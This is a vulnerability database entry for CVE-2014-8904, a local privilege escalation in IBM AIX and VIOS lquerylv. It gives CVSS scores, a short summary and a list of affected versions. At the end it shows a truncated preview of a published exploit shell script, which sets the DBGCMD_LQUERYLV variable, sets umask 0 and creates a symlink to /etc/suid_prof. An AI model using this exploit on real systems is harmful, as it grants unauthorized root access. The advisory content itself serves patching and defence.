7.2
CVSSv2

CVE-2014-8904

Published: 15/01/2015 Updated: 31/08/2021
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 725
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

lquerylv in cmdlvm in IBM AIX 5.3, 6.1, and 7.1 and VIOS 2.2.x allows local users to gain privileges via a crafted DBGCMD_LQUERYLV environment-variable value.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

ibm vios 2.2.0.10

ibm vios 2.2.1.4

ibm vios 2.2.1.5

ibm vios 2.2.2.3

ibm vios 2.2.2.4

ibm vios 2.2.0.13

ibm vios 2.2.1.0

ibm vios 2.2.1.9

ibm vios 2.2.2.0

ibm vios 2.2.3.1

ibm vios 2.2.3.2

ibm vios 2.2.0.11

ibm vios 2.2.0.12

ibm vios 2.2.1.6

ibm vios 2.2.1.7

ibm vios 2.2.1.8

ibm vios 2.2.2.5

ibm vios 2.2.3.0

ibm vios 2.2.1.1

ibm vios 2.2.1.3

ibm vios 2.2.2.1

ibm vios 2.2.2.2

ibm vios 2.2.3.3

ibm vios 2.2.3.4

ibm aix 5.3

ibm aix 6.1

ibm aix 7.1

Exploits

#!/bin/sh # # Exploit Title: AIX 71 lquerylv privilege escalation # Date: 20151030 # Exploit Author: S2 Crew [Hungary] # Vendor Homepage: wwwibmcom # Software Link: - # Version: - # Tested on: AIX 71 (7100-02-03-1334) # CVE : CVE-2014-8904 # # From file writing to command execution ;) # export _DBGCMD_LQUERYLV=1 umask 0 ln -s /etc/suid_prof ...